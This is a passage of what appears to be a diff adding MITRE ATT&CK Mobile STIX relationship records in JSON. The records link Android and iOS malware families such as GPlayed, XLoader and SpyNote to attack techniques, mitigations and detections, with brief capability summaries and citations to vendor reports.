", + "modified": "2022-04-05T19:38:41.538Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "target_ref": "attack-pattern--9ef05e3d-52db-4c12-be4f-519214bbe91f", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5e95ca90-bf75-4031-a28f-f8565c02185c", + "created": "2020-11-24T17:55:12.883Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos GPlayed", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020.", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:23:49.569Z", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) can lock the user out of the device by showing a persistent overlay.(Citation: Talos GPlayed)", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--eb6cf439-1bcb-4d10-bc68-1eed844ed7b3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d44b097a-1bba-40bd-8ec8-d717a3f3df0c", + "created": "2023-03-03T16:24:30.564Z", + "revoked": false, + "external_references": [ + { + "source_name": "paloalto_yispecter_1015", + "description": "Claud Xiao. (2015, October 4). YiSpecter: First iOS Malware That Attacks Non-jailbroken Apple iOS Devices by Abusing Private APIs. 
Retrieved March 3, 2023.", + "url": "https://unit42.paloaltonetworks.com/yispecter-first-ios-malware-attacks-non-jailbroken-ios-devices-by-abusing-private-apis/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-03T16:24:30.564Z", + "description": "[YiSpecter](https://attack.mitre.org/software/S0311) has hijacked normal application’s launch routines to display ads.(Citation: paloalto_yispecter_1015)", + "relationship_type": "uses", + "source_ref": "malware--a15c9357-2be0-4836-beec-594f28b9b4a9", + "target_ref": "attack-pattern--670a4d75-103b-4b14-8a9e-4652fa795edd", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--373223d8-f18c-4151-8fe0-7d40c0c6e631", + "type": "relationship", + "created": "2020-11-24T17:55:12.885Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos GPlayed", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020." 
+ } + ], + "modified": "2020-11-24T17:55:12.885Z", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) has used timers to enable Wi-Fi, ping the C2 server, register the device with the C2, and register wake locks on the system.(Citation: Talos GPlayed)", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--00290ac5-551e-44aa-bbd8-c4b913488a6d", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--cb80178a-5f9c-41bd-95a2-a7c5fe23c12c", + "created": "2022-04-01T18:48:03.156Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-01T18:48:03.156Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--dc01774a-d1c1-45fb-b506-0a5d1d6593d9", + "target_ref": "attack-pattern--20b0931a-8952-42ca-975f-775bad295f1a", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--079911c5-0db9-4eb2-ab85-6ed6e118fbbc", + "created": "2022-03-30T19:36:20.304Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "Users should be trained on what device administrator permission request prompts look like, and how to avoid granting permissions on phishing popups.", + "modified": "2022-03-30T19:36:20.304Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--653492e3-27be-4a0e-b08c-938dd2b7e0e1", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + 
"x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--22290cce-856a-46d5-9589-699f5dfc1429", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "TrendMicro-XLoader", + "description": "Lorin Wu. (2018, April 19). XLoader Android Spyware and Banking Trojan Distributed via DNS Spoofing. Retrieved July 6, 2018.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing/" + } + ], + "modified": "2020-07-20T13:49:03.687Z", + "description": "[XLoader for Android](https://attack.mitre.org/software/S0318) covertly records phone calls.(Citation: TrendMicro-XLoader)", + "relationship_type": "uses", + "source_ref": "malware--2740eaf6-2db2-4a40-a63f-f5b166c7059c", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--27490b14-8044-408a-8c6a-6d8427eb78ff", + "created": "2023-03-20T18:44:26.233Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:44:26.233Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--498e7b81-238d-404c-aa5e-332904d63286", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + 
"x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2836dc3d-cbea-493b-af31-5f1fa8279ec2", + "created": "2020-04-24T17:46:31.589Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecurityIntelligence TrickMo", + "description": "P. Asinovsky. (2020, March 24). TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany. Retrieved April 24, 2020.", + "url": "https://securityintelligence.com/posts/trickbot-pushing-a-2fa-bypass-app-to-bank-customers-in-germany/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:00:28.299Z", + "description": "[TrickMo](https://attack.mitre.org/software/S0427) communicates with the C2 by sending JSON objects over unencrypted HTTP requests.(Citation: SecurityIntelligence TrickMo)", + "relationship_type": "uses", + "source_ref": "malware--21170624-89db-4e99-bf27-58d26be07c3a", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e3d04885-95a5-47cb-a038-b58542cf787d", + "created": "2019-09-03T19:45:48.487Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. 
Retrieved September 3, 2019.", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:08:39.524Z", + "description": "[Exodus](https://attack.mitre.org/software/S0405) Two can exfiltrate the call log.(Citation: SWB Exodus March 2019) ", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--3c3c957e-7a23-4801-9f6a-ba599ad727d7", + "type": "relationship", + "created": "2019-10-15T19:33:42.204Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Kaspersky-Skygofree", + "description": "Nikita Buchka and Alexey Firsh. (2018, January 16). Skygofree: Following in the footsteps of HackingTeam. 
Retrieved September 24, 2018.", + "url": "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/" + } + ], + "modified": "2019-10-15T19:33:42.204Z", + "description": "[Skygofree](https://attack.mitre.org/software/S0327) can track the device's location.(Citation: Kaspersky-Skygofree)", + "relationship_type": "uses", + "source_ref": "malware--3a913bac-4fae-4d0e-bca8-cae452f1599b", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--91de92af-fe1d-469e-8c36-1a9f4b621a27", + "type": "relationship", + "created": "2020-07-20T13:27:33.488Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos-WolfRAT", + "url": "https://blog.talosintelligence.com/2020/05/the-wolf-is-back.html", + "description": "W. Mercer, P. Rascagneres, V. Ventura. (2020, May 19). The wolf is back... . Retrieved July 20, 2020." + } + ], + "modified": "2020-08-10T21:57:54.704Z", + "description": "[WolfRAT](https://attack.mitre.org/software/S0489)’s code is obfuscated.(Citation: Talos-WolfRAT)", + "relationship_type": "uses", + "source_ref": "malware--dfdac962-9461-47f0-a212-36dfce2a97e6", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b7282bf9-63f8-49ad-8ee0-f2ad523a367e", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "PaloAlto-DualToy", + "description": "Claud Xiao. 
(2016, September 13). DualToy: New Windows Trojan Sideloads Risky Apps to Android and iOS Devices. Retrieved January 24, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[DualToy](https://attack.mitre.org/software/S0315) side loads malicious or risky apps to both Android and iOS devices via a USB connection.(Citation: PaloAlto-DualToy)", + "relationship_type": "uses", + "source_ref": "malware--507fe748-5e4a-4b45-9e9f-8b1115f4e878", + "target_ref": "attack-pattern--667e5707-3843-4da8-bd34-88b922526f0d", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--9c853c22-7607-4cbd-b114-08aaa4625c35", + "type": "relationship", + "created": "2020-12-17T20:15:22.405Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019." 
+ } + ], + "modified": "2020-12-28T18:47:52.600Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) can collect device information and can check if the device is running MIUI on a Xiaomi device.(Citation: Palo Alto HenBox)", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--99b4be95-74f2-48f7-b4e9-8b4d88ecd31f", + "created": "2020-09-11T14:54:16.642Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020.", + "url": "https://blog.lookout.com/desert-scorpion-google-play" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T21:21:19.617Z", + "description": "If running on a Huawei device, [Desert Scorpion](https://attack.mitre.org/software/S0505) adds itself to the protected apps list, which allows it to run with the screen off.(Citation: Lookout Desert Scorpion)", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d638565b-ca8e-459f-9c3b-1bd8828606f5", + "type": "relationship", + 
"created": "2020-11-24T17:55:12.897Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Talos GPlayed", + "url": "https://blog.talosintelligence.com/2018/10/gplayedtrojan.html", + "description": "V. Ventura. (2018, October 11). GPlayed Trojan - .Net playing with Google Market . Retrieved November 24, 2020." + } + ], + "modified": "2020-11-24T17:55:12.897Z", + "description": "[GPlayed](https://attack.mitre.org/software/S0536) can collect the user’s browser cookies.(Citation: Talos GPlayed)", + "relationship_type": "uses", + "source_ref": "malware--a993495c-9813-4372-b9ec-d168c7f7ec0a", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--465d14e7-eb9e-4794-9cb3-1de2cff86a8e", + "created": "2020-01-27T17:05:58.335Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Trend Micro Bouncing Golf 2019", + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign ‘Bouncing Golf’ Affects Middle East. 
Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:28:07.442Z", + "description": "[GolfSpy](https://attack.mitre.org/software/S0421) registers for the `USER_PRESENT` broadcast intent and uses it as a trigger to take photos with the front-facing camera.(Citation: Trend Micro Bouncing Golf 2019)", + "relationship_type": "uses", + "source_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7ba4fb2e-99ff-41ff-8b07-f02e9f74e890", + "created": "2023-01-18T19:09:40.955Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cyble_drinik_1022", + "description": "Cyble. (2022, October 27). Drinik Malware Returns With Advanced Capabilities Targeting Indian Taxpayers. 
Retrieved January 18, 2023.", + "url": "https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:58:45.439Z", + "description": "[Drinik](https://attack.mitre.org/software/S1054) can record the screen via the `MediaProjection` library to harvest user credentials, including biometric PINs.(Citation: cyble_drinik_1022)", + "relationship_type": "uses", + "source_ref": "malware--d6e009b7-df5e-447a-bfd2-d5b77374edfe", + "target_ref": "attack-pattern--73c26732-6422-4081-8b63-6d0ae93d449e", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--20aaafe2-1f55-410f-9eb1-1fc979021fe0", + "created": "2020-12-24T21:55:56.741Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. 
Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:51:16.331Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) has accessed the contact list.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--5417959b-9478-49fb-b779-3c82a10ad080", + "type": "relationship", + "created": "2020-12-17T20:15:22.498Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019." 
+ } + ], + "modified": "2020-12-17T20:15:22.498Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) can obtain a list of running apps.(Citation: Palo Alto HenBox)", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d09abcd8-49bf-4d0f-8b17-0db7ada10ec2", + "type": "relationship", + "created": "2020-09-11T15:53:38.453Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "securelist rotexy 2018", + "url": "https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/", + "description": "T. Shishkova, L. Pikman. (2018, November 22). The Rotexy mobile Trojan – banker and ransomware. Retrieved September 23, 2019." 
+ } + ], + "modified": "2020-09-11T15:53:38.453Z", + "description": "[Rotexy](https://attack.mitre.org/software/S0411) can automatically reply to SMS messages, and optionally delete them.(Citation: securelist rotexy 2018)", + "relationship_type": "uses", + "source_ref": "malware--0626c181-93cb-4860-9cb0-dff3b1c13063", + "target_ref": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2f55e452-f8b3-402b-a193-d261dac9f327", + "created": "2022-04-01T18:53:48.715Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-01T18:53:48.715Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49", + "target_ref": "attack-pattern--20b0931a-8952-42ca-975f-775bad295f1a", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--346b7e4a-dbd1-486b-ba26-55ae2ac613d0", + "type": "relationship", + "created": "2020-12-14T14:52:03.396Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Sophos Red Alert 2.0", + "url": "https://news.sophos.com/en-us/2018/07/23/red-alert-2-0-android-trojan-targets-security-seekers/", + "description": "J. Chandraiah. (2018, July 23). Red Alert 2.0: Android Trojan targets security-seekers. Retrieved December 14, 2020." 
+ } + ], + "modified": "2020-12-16T20:52:21.426Z", + "description": "[Red Alert 2.0](https://attack.mitre.org/software/S0539) can download additional overlay templates.(Citation: Sophos Red Alert 2.0)", + "relationship_type": "uses", + "source_ref": "malware--6e282bbf-5f32-476a-b879-ba77eec463c8", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0008005f-ca51-47c3-8369-55ee5de1c65a", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Zscaler-SpyNote", + "description": "Shivang Desai. (2017, January 23). SpyNote RAT posing as Netflix app. Retrieved January 26, 2017.", + "url": "https://www.zscaler.com/blogs/research/spynote-rat-posing-netflix-app" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:43:54.975Z", + "description": "[SpyNote RAT](https://attack.mitre.org/software/S0305) uses an Android broadcast receiver to automatically start when the device boots.(Citation: Zscaler-SpyNote)", + "relationship_type": "uses", + "source_ref": "malware--20dbaf05-59b8-4dc6-8777-0b17f4553a23", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--98b14660-79e1-4244-99c2-3dedd84eb68d", + "type": "relationship", + "created": "2020-09-11T14:54:16.582Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": 
"Lookout Desert Scorpion", + "url": "https://blog.lookout.com/desert-scorpion-google-play", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-11T14:54:16.582Z", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) can track the device’s location.(Citation: Lookout Desert Scorpion)", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--99e6295e-741b-4857-b6e5-64989eb039b4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--8cb42e3d-69f4-4b0d-98c9-0bb7560947c1", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "TrendMicro-RCSAndroid", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/hacking-team-rcsandroid-spying-tool-listens-to-calls-roots-devices-to-get-in/", + "description": "Veo Zhang. (2015, July 21). Hacking Team RCSAndroid Spying Tool Listens to Calls; Roots Devices to Get In. Retrieved December 22, 2016." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[RCSAndroid](https://attack.mitre.org/software/S0295) can use SMS for command and control.(Citation: TrendMicro-RCSAndroid)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--363bc05d-13cb-4e98-a5b7-e250f2bbdc2b", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--605d95a1-0493-418e-9d81-de58531c4421", + "created": "2020-04-24T15:12:11.217Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "TrendMicro Coronavirus Updates", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. 
Retrieved April 24, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:04:31.136Z", + "description": "[Concipit1248](https://attack.mitre.org/software/S0426) communicates with the C2 server using HTTP requests.(Citation: TrendMicro Coronavirus Updates)", + "relationship_type": "uses", + "source_ref": "malware--89c3dbf6-f281-41b7-be1d-a0e641014853", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f062ebc5-bad0-4b19-8c97-bf3915d687bd", + "created": "2023-03-20T18:51:58.152Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:51:58.152Z", + "description": "", + "relationship_type": "detects", + "source_ref": 